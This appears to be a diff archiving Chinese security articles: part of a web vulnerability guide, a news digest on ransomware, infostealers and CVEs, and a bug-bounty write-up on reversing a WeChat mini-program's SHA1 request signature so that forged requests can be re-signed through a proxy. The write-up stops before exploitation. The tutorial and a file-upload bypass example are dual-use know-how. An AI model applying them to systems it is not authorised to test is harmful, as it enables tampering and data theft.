**技术要点**
- • 实施最小权限原则
- • 建立动态访问控制模型DAC到ABAC的升级路径
**防护策略**
- • 部署微服务API网关实现细粒度权限控制
- • 引入零信任架构,持续验证访问上下文合法性
### TOP4 SQL注入漏洞
**虽跌出前三,仍是核心威胁**
:某银行信用卡系统因未过滤特殊字符,导致用户征信数据泄露
**攻击演进**
- • 新型二阶SQL注入占比提升至37%(攻击载荷分阶段执行规避检测)
- • 云原生环境下的NoSQL注入案例年增长182%
**防御升级**
- • 采用ORM框架+参数化查询双保险机制
- • 部署AI驱动的WAF实时学习业务流量特征
### TOP5 配置管理漏洞
**典型问题**
:某交易系统因默认开启调试接口,遭攻击者利用获取内网拓扑
**管理盲区**
- • 云环境安全组配置错误
- • 中间件安全基线未达标
**整改要点**
- • 实施CIS安全基线自动化核查
- • 建立配置变更追溯机制,关键操作需双人复核
### TOP6 敏感信息泄露
**数据灾难**
某政务云平台因API响应包包含完整SQL语句导致数据库结构被反推
**泄露渠道**
- • 前端源码暴露加密密钥
- • 错误页面披露堆栈信息
**加密策略**
- • 实施国密算法动态密钥体系
- • 部署数据分级脱敏引擎,建立字段级访问控制
### TOP7 跨站脚本攻击XSS
**新型攻击**
某社交平台存储型XSS漏洞被利用传播蠕虫病毒24小时内感染80万用户
**防御难点**
- • 富文本编辑器XSS过滤绕过常见于CMS系统
- • DOM型XSS动态检测覆盖率不足
**解决方案**
- • 实施内容安全策略CSP白名单机制
- • 部署Headless浏览器沙箱进行动态渲染检测
### TOP8 组件已知漏洞
**供应链危机**
某智慧城市项目因Apache Log4j2漏洞未修复导致全市交通摄像头被控9
**管理痛点**
- • 组件资产台账缺失
- • 漏洞修复周期过长
**管理升级**
- • 建立SCA软件成分分析自动化检测平台
- • 制定漏洞修复SLA高危漏洞24小时内热修复
### TOP9 会话管理缺陷
**身份劫持**
某在线教育平台因会话ID未绑定设备指纹遭中间人攻击窃取教师账号
**技术缺陷**
- • 会话固定攻击防护缺失
- • Token刷新机制不合理
**安全加固**
- • 实施动态会话令牌每5分钟更新签名密钥
- • 绑定多维度环境指纹IP、UA、行为特征
### TOP10 文件上传漏洞
**渗透突破口**
某制造企业OA系统因未校验文件类型被上传Webshell导致全线生产数据泄露
**绕过手法**
- • 双扩展名攻击(如"payload.jpg.php"
- • 图像隐写术结合恶意代码
**防护体系**
- • 部署无签名检测引擎(基于文件熵值+代码特征检测)
- • 建立沙箱动态行为分析机制
## 三、等保合规防护体系构建指南
### 1. 建立漏洞生命周期管理
- • **发现阶段**
采用IAST+DAST组合检测提升漏洞检出率
- • **处置阶段**
制定分级修复SLA高危漏洞12小时内临时处置
- • **验证阶段**
引入攻击模拟验证BAS技术
### 2. 技术防御体系升级
- • **边界防护**
:下一代防火墙+云WAF组合部署提升拦截效率
- • **数据安全**
:实施同态加密+动态脱敏,实现“可用不可见”
- • **监测响应**
构建ATT&CK攻击图谱实现TTPs战术识别
### 3. 管理机制优化
- • **开发安全**
落地SDL流程关键系统代码安全测试覆盖率100%
- • **运维审计**
:建立“三权分立”机制,高危操作需双人生物特征确认
- • **应急演练**
每季度开展红蓝对抗平均MTTD缩短至8分钟
在等保2.0向3.0过渡的关键期,企业需建立“漏洞管理-威胁监测-应急响应”的全链条防御体系。只有深入理解等保测评的底层逻辑,才能将合规要求转化为真正的安全能力。
 

View File

@ -0,0 +1,141 @@
# 西班牙汉堡王备份系统遭遇RCE漏洞威胁黑客4000美元叫卖访问权限。
汇能云安全 2025-05-27 01:22
![](https://mmbiz.qpic.cn/mmbiz_jpg/NSXvotEG4JwA6iae234BZTcVibeERibUSXzxloMFcV9MHnsSJdcGYj72ZLF5IwV4YO6g8IeYKRsMQPicXQqmmGCiaBw/640?wx_fmt=jpeg&from=appmsg "")
**5****月****26****日,星期一****,您好!中科汇能与您分享信息安全快讯:**
![](https://mmbiz.qpic.cn/mmbiz_gif/NSXvotEG4Jx5iaea1UZfYejGNNutqUnh2ua8iaVnKLXIqKrDKDCvDPp58kSYic4aqVUrdbn4JGC8DMXl7vbdGnJeA/640?wx_fmt=gif&from=appmsg "")
**01**
**地盘战打响DragonForce争夺勒索软件市场主导权**
根据Sophos最新研究勒索软件组织DragonForce正与竞争对手展开"地盘战"试图在网络犯罪市场中确立主导地位。该组织疑似对2025年3月底RansomHub基础设施中断负责这导致4月份勒索软件攻击显著减少可能是DragonForce试图对该组织进行"敌意接管"的结果。
**研究人员观察到DragonForce对勒索软件即服务(RaaS)竞争对手的攻击始于2025年3月当时该组织将自身重塑为"卡特尔"以扩大影响力。这种卡特尔模式允许附属组织利用DragonForce的基础设施和勒索软件工具同时保持自有品牌运营。**
DragonForce通过推出"RansomBay"白标服务为该模式奠定基础允许附属组织以不同名称重塑勒索软件。附属组织支付20%的赎金分成而DragonForce则负责底层基础设施、技术支持和泄露站点托管。据报道DragonForce的基础设施被Scattered Spider利用在4月底针对英国零售玛莎百货、Co-operative Group和Harrods发动攻击。
这与BlackLock和Mamona勒索软件组织运营的泄露站点被篡改事件同时发生篡改页面显示DragonForce的标志。随后DragonForce与RansomHub之间似乎爆发了一场重大地盘战。
最初这些组织似乎可能开始合作RansomHub泄露站点上出现了标题为"欢迎加入DragonForce卡特尔"的帖子。然而不久后RansomHub的泄露站点下线显示"RansomHub R.I.P 03/03/2025"的消息。Sophos研究人员指出"DragonForce和RansomHub之间的'合作'似乎更像是DragonForce的敌意接管。"
**02**
**多阶段Chihuahua信息窃取木马现身利用Google Drive窃取浏览器凭证和加密钱包**
**研究人员近日发现2025年4月首次被检测到的新型.NET恶意软件Chihuahua Infostealer主要针对浏览器凭证和加密货币钱包数据进行窃取。与传统恶意软件不同Chihuahua采用多阶段加载器、云托管传递、基于原生API的加密和精细的清理例程使其更难被检测和防御。**
Chihuahua的感染链分为三个阶段首先通过社会工程学诱导用户执行恶意PowerShell脚本该脚本会解码Base64编码的有效载荷并在内存中执行避免写入磁盘以规避杀毒软件检测最后恶意软件从flowers.hold-me-finger[.]xyz下载.NET程序集和从OneDrive下载Base64编码的载荷使用.NET反射在内存中执行随后清理控制台、擦除剪贴板内容和本地痕迹。
根据picussecurity的报告Chihuahua针对Chrome、Chromium、Brave、Opera、Microsoft Edge等多种浏览器窃取保存的密码、Cookie、自动填充数据、会话令牌和浏览历史。它还通过定位特定浏览器扩展ID如EVER Wallet、Rabby和Clover Wallet来窃取加密货币钱包数据。
**03**
**AI浪潮下的安全危机91%企业在混合云环境中做出风险妥协**
**根据Gigamon发布的2025年混合云安全调查高达91%的组织承认在AI快速发展的压力下在混合云环境中做出了危险的安全妥协。随着AI应用激增和混合架构扩展安全态势仍然危险地分散。**
该调查覆盖了1000多名安全和IT领导者结果显示数据泄露率同比增长17%达到55%主要由AI驱动的攻击推动。导致这些安全妥协的主要因素包括用于安全AI工作负载部署的数据质量不佳46%和东西向流量可见性不足47%。70%的安全领导者将公共云视为首要安全隐患。超过一半的企业正在考虑将数据迁回私有云而54%的企业因担心知识产权泄露和治理缺口而不愿在公共云中部署AI。
可见性仍然是核心痛点。55%的安全领导者对其工具在分散基础设施中检测漏洞的能力缺乏信心。因此64%的企业优先考虑通过对数据流动的完全可见性来实现实时威胁监控89%认为深度可观察性是保护混合云基础设施的基础。约83%的董事会表示,现在正在董事会层面讨论可观察性,以更好地保护混合云环境。
AI正在加剧现有的安全缺口。企业正经历AI驱动的勒索软件攻击激增从2024年的41%上升到今年的58%。7%的企业已经遭遇专门针对大语言模型LLMs的攻击。
**04**
**西班牙汉堡王备份系统遭遇RCE漏洞威胁黑客4000美元叫卖访问权限**
威胁行为者#LongNight近日在黑客论坛上公开叫价4000美元,声称出售西班牙汉堡王备份基础设施的远程代码执行(RCE)访问权限。该漏洞针对汉堡王使用的AhsayCBS备份系统。这是该公司数据管理基础设施的关键组件负责处理跨多个存储平台的敏感企业信息。
AhsayCBS平台作为一个集中式备份服务器具有网页控制台功能管理着本地存储系统、FTP/SFTP连接以及包括Amazon Web Services和Microsoft Azure在内的主要云服务中的数据。这种综合备份解决方案通常处理并存储大量企业数据使其成为寻求有价值信息或计划勒索软件攻击的网络犯罪分子的理想目标。据报道约2.6太字节的敏感信息可能面临风险。
**该漏洞利用机制允许攻击者在备份操作期间执行任意代码,特别是在备份过程的初始化和完成阶段。通过针对备份操作期间的执行点,攻击者可能访问敏感数据流、修改备份完整性,或在不被传统安全措施检测到的情况下建立对企业网络的持久访问。**
**05**
**DIANNA AI助手首次成功识别大语言模型生成的恶意软件**
今年2月网络安全领域迎来重要里程碑复杂恶意软件BypassERWDirectSyscallShellcodeLoader 被发现。**Deep Instinct分析师通过其专有的DIANNA系统识别了这一威胁这是生成式AI助手首次成功解释和分类AI生成的恶意软件样本。这一突破性发展标志着AI驱动工具已在网络战争的双方同时部署从根本上改变了威胁的创建、检测和分析方式。**
该恶意软件使用ChatGPT和DeepSeek等知名大语言模型创建代表着从传统手工编码恶意软件向AI生成威胁的范式转变。这些AI生成的威胁能够快速生产同时具备增强的复杂性和复杂的混淆技术。发现时间线揭示了传统安全方法的关键漏洞Deep Instinct在恶意软件出现在VirusTotal平台前数小时就已检测并阻止了该威胁而在VirusTotal上最初只有六家安全供应商将其标记为恶意。
BypassERWDirectSyscallShellcodeLoader的攻击方法集中在其无缝加载和部署多种有效载荷的能力同时通过综合防御机制保持隐蔽性。该恶意软件作为模块化框架运行允许攻击者根据目标集成各种有效载荷。
**06**
**针对中文用户的安全威胁黑客利用伪装安装程序部署Catena链传播Winos 4.0**
**Rapid7安全研究人员近期揭露了一起复杂的恶意软件攻击活动黑客通过伪装成LetsVPN和QQ浏览器等流行软件的虚假安装程序传播Winos 4.0内存驻留恶意软件。**
该活动于2025年2月首次在一次托管检测与响应(MDR)调查中被发现采用了一种名为Catena的多层感染链。
攻击者利用特洛伊化的NSIS安装程序将恶意载荷完全部署在内存中从而规避传统杀毒工具的检测。这一活动到现在持续活跃主要针对中文环境用户其基础设施主要托管在香港显示出高水平的策划能力可能与Silver Fox APT组织有关。
Catena加载器的感染过程始于看似合法的NSIS安装程序它会释放带有欺骗性的签名可执行文件同时部署恶意组件如嵌入shellcode的INI文件和反射式DLL。
一旦执行Winos 4.0会通过TCP端口18852或HTTPS端口443连接到攻击者控制的服务器获取额外的有效载荷并通过计划任务和监视脚本确保持久性。该恶意软件还会检查中文语言设置尽管这一过滤器并未严格执行暗示了区域性定向攻击意图。
**07**
**国际"终局行动"重创恶意软件生态系统DanaBot被瓦解QakBot头目被起诉**
**国际执法机构近日宣布,由美国、加拿大和欧盟联合发起的"终局行动"(Operation Endgame)取得重大进展成功瓦解DanaBot僵尸网络并起诉了DanaBot和Qakbot恶意软件即服务(MaaS)组织的领导人。**
在5月19日至22日的行动中执法部门全球范围内关闭了约300台服务器接管了650个域名并对20个目标发出国际逮捕令。此次行动主要针对Bumblee、Hijackloader、Lactrodectus、Qakbot、DanaBot、Trickbot和Warmcookie后门等多种恶意软件加载器这些工具常被用于大规模勒索软件攻击的前期准备。
美国司法部公布了对16名涉嫌开发和部署DanaBot恶意软件的嫌疑人的指控其中两名俄罗斯籍嫌疑人Aleksandr Stepanov"JimmBee"和Artem Aleksandrovich Kalinkin"Onix"被点名。该恶意软件不仅针对金融欺诈还专门开发了一个版本瞄准北美和欧洲的军事、外交和政府实体。同时美国司法部还起诉了来自莫斯科的Rustam Rafailevich Gallyamov指控其为Qakbot恶意软件团伙的领导者。
**08**
**Versa修复Concerto SD-WAN平台三个高危漏洞串联可导致完全系统入侵**
Versa Networks近日修复了其Concerto网络安全和SD-WAN编排平台中的三个严重漏洞。**Project Discovery研究团队指出这些漏洞如果被串联起来可能允许攻击者完全入侵应用程序和底层主机系统。这项研究突显现代云部署中的小型配置错误可升级为严重的安全风险特别是对于处理敏感网络配置和企业数据的平台。**
这三个Versa Concerto漏洞分别为
CVE-2025-34027评级10.0的竞争条件和不当身份验证漏洞。Concerto平台在12.1.2至12.2.0版本中的Traefik反向代理配置存在身份验证绕过问题可能允许攻击者访问管理端点。Spack上传端点可能与竞争条件结合通过路径加载操作实现远程代码执行。
CVE-2025-34026评级9.2的不当身份验证漏洞。Traefik反向代理配置中的身份验证绕过可能允许内部Actuator端点被利用从而访问堆转储和跟踪日志。
作为拥有企业和服务提供商客户群的公司Versa的及时响应非常重要。Versa声明这些漏洞已于3月7日通过热修复程序得到修复并在4月16日的Concerto 12.2.1正式版本中完全解决。Versa强调目前没有迹象表明这些漏洞被黑客利用也没有客户报告受到影响。
**09**
**FBI警告SRG索团伙针对律师事务所发动攻击**
FBI近日发布警告勒索团伙Silent Ransom Group (SRG)在过去两年中通过回拨网络钓鱼和社会工程学攻击手段,持续针对美国律师事务所实施攻击。
该团伙也被称为Luna Moth、Chatty Spider或UNC3753自2022年活跃以来曾参与为Ryuk和Conti勒索软件攻击提供初始网络访问权限的BazarCall活动。在最近的攻击中SRG通过电子邮件、虚假网站和电话冒充目标公司的IT支持人员利用社会工程学策略获取目标网络访问权限。与传统勒索软件不同该团伙不加密受害者系统而是威胁泄露从受害设备窃取的敏感信息以此勒索赎金。一旦获取受害者设备访问权SRG攻击通常涉及最小权限提升并迅速转向通过“WinSCP”或隐藏版本的“Rclone”进行数据窃取。
**FBI建议组织采用强密码、为所有员工启用双因素认证、定期备份数据并对员工进行钓鱼识别培训以防御此类攻击。**
10
**《网络交易平台收费行为合规指南》面向社会征求意见**
为规范网络交易平台向平台内经营者收取佣金、抽成、会员费、技术服务费、信息服务费、营销推广费等收费行为,维护平台内经营者合法权益,促进平台经济健康有序发展,近日,市场监管总局研究起草了《网络交易平台收费行为合规指南(征求意见稿)》(以下简称《指南》),并向社会公开征求意见。
**《指南》共28条主要内容包括5个方面一是明确平台收费要遵循的原则二是倡导降低平台内经营者负担三是强化平台合规自律四是规范平台收费行为。五是加强监督与实施。其中在“强化平台合规自律”方面要求平台按照有关规定落实合规管理主体责任健全合规管理组织、配备合规管理人员建立不合理收费风险识别评估、防范收费风险的事前合规审核等机制提升平台收费合规管理能力。**
下一步,市场监管总局将根据社会公开征求意见反馈情况完善《指南》内容,尽快出台实施,进一步健全平台经济常态化监管制度,持续规范平台收费行为,推动平台经济有序健康发展。
![](https://mmbiz.qpic.cn/mmbiz_gif/NSXvotEG4Jx5iaea1UZfYejGNNutqUnh2RiaxLTx7bsWNSSAe49tXkwH5WtWjEsfelwB7TA9opAW5sK61stBFvZQ/640?wx_fmt=gif&from=appmsg "")
信息来源:人民网 国家计算机网络应急技术处理协调中心 国家信息安全漏洞库 今日头条 360威胁情报中心 中科汇能GT攻防实验室 安全牛 E安全 安全客 NOSEC安全讯息平台 火绒安全 亚信安全 奇安信威胁情报中心 MACFEESy mantec白帽汇安全研究院 安全帮  卡巴斯基 安全内参 安全学习那些事 安全圈 黑客新闻 蚁景网安实验室 IT之家IT资讯 黑客新闻国外 天际友盟
![](https://mmbiz.qpic.cn/mmbiz_png/NSXvotEG4Jy8LNPtUFy94c9CGG0ASQqK4WcEDppBOWoymg5KyMOPPy14tftLVEgIibMlwuvsTjffaicjlVtficB2A/640?wx_fmt=png&from=appmsg "")
本文版权归原作者所有,如有侵权请联系我们及时删除

View File

@ -1,23 +1,29 @@
# 记一次实战小程序漏洞测试到严重漏洞
律师 富贵安全 2025-05-06 00:40
律师 乌雲安全 2025-05-27 03:23
文章作者:奇安信攻防社区(律师)
文章来源https://forum.butian.net/share/3832
# 前言
本文记录了最近的一次src漏洞挖掘并成功获取到严重漏洞的过程漏洞本身就是几个接口的组合利用但是其中小程序的代码的分析审计过程比较有趣遂记录一下和大家分享。
# 准备工作
本文涉及到小程序的静态分析、动态调试、签名算法逆向、自动化签名计算等方面,很多技术在网上都有比较详细的文章,我就不在深入赘述,这里只记录我在分析过程中用到的技术和方法。
## 获取小程序源码
获取小程序源码
获取小程序的源码比较简单,直接在微信-设置-文件管理-打开文件夹
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgoIJjrRpgibGImlj6PcdwohQbDHv6k39DMYNrSu2JvJLZohrSubfYmjg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8PK6pgutelFrZicmLaFeYXTf0VNjUxcub42pVLBcFnJj1q5dxvTEGicSA/640?wx_fmt=png&from=appmsg "")
会自动打开文件目录
```
C:\Users\Administrator\Documents\WeChat Files\AppId
```
这里我们需要跳到小程序的目录
```
/WeChat Files/Applet/{wxid}/{n}/
@ -28,8 +34,7 @@ C:\Users\Administrator\Documents\WeChat Files\AppId
直接把文件拖到exe程序的图标上便可以自动解密
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgAGRibcgSIgevTx8NQ25GUCicKzria7U4xCskicDXIpGMb95Hw1OzB3jeDA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B82yfESuGGW0NnuibeibsYj3fkep1jAUfEwto1O3R2C7ehibVe7DISIB6hQ/640?wx_fmt=png&from=appmsg "")
解密后会在当前目录保存解包后的文件。
## 开启Devtools
@ -42,41 +47,36 @@ C:\Users\Administrator\Documents\WeChat Files\AppId
微信的历史版本可以在https://github.com/tom-snow/wechat-windows-versions/tags
下载。
这里需要注意一下的是如果电脑上安装了高版本的微信需要先卸载掉再安装低版本否则hook的时候会失败。并且hook有风险建议使用小号在虚拟机里运行
这里需要注意一下的是如果电脑上安装了高版本的微信需要先卸载掉再安装低版本否则hook的时候会失败。并且hook有风险建议使用小号在虚拟机里运行
程序的运行很简单,退出微信后执行
```
WeChatOpenDevTools-Python.exe -all
```
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgbxpNsBRoG8ldntMKTrIVfrqy6Bz4XrEiaMfgc1tDxqpgLPTCmWUD9GA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8OAIy0B2Jh9yZiboYqkdf8PbSauskWzvM72kbLdgEr0wkL3pWIiaZ6HaA/640?wx_fmt=png&from=appmsg "")
会自动弹出微信登录后打开小程序即可hook成功
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgdvjicib0b55kNJN6CPWkNicnXwAfAU8GLop7TE8JbBtHMjQB6atDsSTDg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8icVvWgoKVBmxGnyH1w0deAemblSqbFaickqlCw0VbAcpEz3ChBiaCWfbA/640?wx_fmt=png&from=appmsg "")
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTg5Pjb39QrqJVwiaTeJZZDIYz0s2V4FVxpnpI2JRglZFkX1swAribict9jg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B84hQ9ht0uyq2HsRT4Sm0t1sggJLicyOm4l1iavj7o5UouQOO5jYvUDN9Q/640?wx_fmt=png&from=appmsg "")
## 小程序抓包
小程序抓包我使用的是proxifier+burp
在peoxifier中新建代理服务器ip和端口对应burp的监听端口协议选择https
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgvibqlhVT89ZpDkvpkD4icwn5icfmEVnDZnXICau8U4On4wcjoe4smIEUA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8r9HVzxwrFVicmo4y21XcEnRSULH7kMajYGlYkrvyQh2NLEibBPKVNuPg/640?wx_fmt=png&from=appmsg "")
然后新建代理规则。
应用程序选择
然后新建代理规则,随后应用程序选择
```
WeChatApp.exe;WechatBrowser.exe;WeChatAppEx.exe
```
动作选择拦截
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTguvHbBbR9ibFmlj2Qoauztfl7OUsqmdNsQiaFdVr7SgrY6QTmeIMUaqWw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8BN5y74RMO8mqovwazx2ZKeL1umR2ylNSFsdV6Gicm64PofnvA7aTVcA/640?wx_fmt=png&from=appmsg "")
即可实现小程序的抓包
## 自动计算签名
@ -89,27 +89,25 @@ WeChatApp.exe;WechatBrowser.exe;WeChatAppEx.exe
使用方法如下:
```
mitmdump -s xx.py -p 7777
mitmdump -s xx.py -p 7777
```
用于加载一个代理脚本并监听7777端口然后我们在burp中把数据包中转到7777端口即可实现mitmproxy自动对数据包进行签名。
burp设置如下
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgvwFTsQLsbVqa7G6Idg44EmKchf2FftTnXia6AMCa5HXwEnQ8WL4E81w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8jy6jgdia73Dw7jTQkAI8OMbibEoVx2RMH8eSUE4OM8Uxb6K9JQBNZ1nw/640?wx_fmt=png&from=appmsg "")
然后再burp中发送数据包进行测试
然后再burp中发送数据包进行测试
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgf8TMH0eXFJaNe28NI0TRxeC5CxSYJ5VgvFxlbL26KyRovmYajZiaEKg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8oQrIyjibRicTlibaiaLfpF9QDc7ibDrPSevyM1xln1D21Jghb4QQ0zIibiaicw/640?wx_fmt=png&from=appmsg "")
看到终端中有数据再跑了,说明配置成功,
这里需要特别说明一下在使用编译好的exe程序运行python程序时可能会出现ModuleNotFoundError: No module named 'Crypto'
找不到库的情况即使是最新版也有可能出现这是一个bug使用pip3重新安装mitmproxy即可解决
```
pip3 install mitmproxy
pip3 install mitmproxy
```
至此,准备工作完成,开始分析小程序
@ -121,82 +119,155 @@ pip3 install mitmproxy
这次的目标是一个客服系统,直接点进去小程序,提示没有对应的客服,然后一篇空白,什么功能都没有,那么看一下他的数据包,
```
POST /wxapi/Customer/Acc HTTP/1.1Host: Content-Length: 37Wxversion: 3.9.12Mobilemodel: microsoftClientplatform: windowsSdkversion: 3.5.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c0f)XWEB/11275Minprogram: v1.9.9Content-Type: application/jsonXweb_xhr: 1X-App: mgwxT: 1728436146712Systemversion: Windows 7 x64Sign: 1e02db58edb4f1e0710f7d9b3da9e39d0af98ffeAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wxf7xxx/78/page-frame.htmlAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close{"UserID":"14979"}
POST /wxapi/Customer/Acc HTTP/1.1
Host: 
Content-Length: 37
Wxversion: 3.9.12
Mobilemodel: microsoft
Clientplatform: windows
Sdkversion: 3.5.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c0f)XWEB/11275
Minprogram: v1.9.9
Content-Type: application/json
Xweb_xhr: 1
X-App: mgwx
T: 1728436146712
Systemversion: Windows 7 x64
Sign: 1e02db58edb4f1e0710f7d9b3da9e39d0af98ffe
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wxf7xxx/78/page-frame.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"UserID":"14979"}
```
有个code随便修改一下提示鉴权失败仔细观察数据包有个sign那么很有可能就是利用的sign来校验数据包我们需要分析一下sign的算法。
有个code随便修改一下提示鉴权失败仔细观察数据包有个sign那么很有可能就是利用的sign来校验数据包我们需要分析一下sign的算法
## sign算法分析
打开devtools
一般在appcontext下的no domain中存储的是小程序的js代码
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgDPped998CDia94VOr5Jg0IhlEuyDLLzAG00cFyIicgAVSAnx19esyTKg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8hUtnIc4CRbTciatia2qGkw6Ww6cvOtycCkjqtt9WYucp4KbNwDVVNczw/640?wx_fmt=png&from=appmsg "")
分别打开这几个js查找sign关键字
定位到这个地方
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgHssqhf0h2ESib9PclV8bT5ScSKRdkW4O4RLbZic4eEbdOhgALXPPfU3g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8Y4ib0shDB1qPHDyodCU1AheCoDmp3Awh4r52D7XjzPKhc2vwr1yNe9g/640?wx_fmt=png&from=appmsg "")
两个处理逻辑一个get的一个其他需要分别分析。
先看get的
先看get的
```
var g = (newDate).getTime();if (s.t = g,"get" == r.toLowerCase()) {                s.requrl = n;var c = n + t.globalData.key + g                  , m = e.SHA1(c).toString();                s.sign = m
            var g = (new Date).getTime();
            if (s.t = g,
            "get" == r.toLowerCase()) {
                s.requrl = n;
                var c = n + t.globalData.key + g
                  , m = e.SHA1(c).toString();
                s.sign = m
```
n就是requrl
var g = (new Date).getTime();
就是时间戳
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgQ7s729XpmuItIeia3wlm7OFeIia27Sz3YGcINxCyliaBiabH6PVXueeAeQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8WNGSTic6M9m9FMhoiawAO548N73vQRo5KrFT8outnT9aNoz4QC0sQzGA/640?wx_fmt=png&from=appmsg "")
还差一个t.globalData.key
全局搜索globalData
。在32486行找到了key
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTg5OCuOMXdb7HfcoNpQzSUOWOpR5OAteK0VJIVAUJia5EicdGwxLFaiahLQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8V37mibJtcr6ymslGdnMKfsbLHdEUDEqbyxhP7AZ1zhlaaA4BNKwngmQ/640?wx_fmt=png&from=appmsg "")
将url+key+g拼接后进行sha1就得到了sign
然后分析其他类型的sign计算
```
 c = JSON.stringify(o) + t.globalData.key + g,                m = e.SHA1(c).toString();                s.sign = m
c = JSON.stringify(o) + t.globalData.key + g,
                m = e.SHA1(c).toString();
                s.sign = m
```
get传的是url+key+g而这个传的是json格式化之后的o往上找o在哪里定义的发现o是直接传参传进来的
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgTNaiaezKG9GxibdhVqib6Ww6rkrhYEaTmHsXvib4YK1dwIzR2pFI3rmtWQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8OZZXsCc7fX7d4E5JSHVKwcicXP3ItiaNafLBobFXBU49kLWj7mLQcEhw/640?wx_fmt=png&from=appmsg "")
这样再往上去找函数调用的话不如动态调试来的方便于是在32185行打上断点
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgxXh6GgjCxrnpuBdXhMOqsQ7iavfeHuRe4XTlxyYnOo3IjdpJtIialZxQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B86ssO4K9dNWWVbSgCtrztIRNV7OWUL4clabXRtSFMhatA3ZPuKFb8ww/640?wx_fmt=png&from=appmsg "")
找一个post功能的点提交一下便会停在断点上
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgJ3OEuR3YlRRnE2Mr9OYVkpV6LAiadfBUib7M0hJQSmsNDeaYS7Ds1ziaw/640?wx_fmt=png&from=appmsg "")
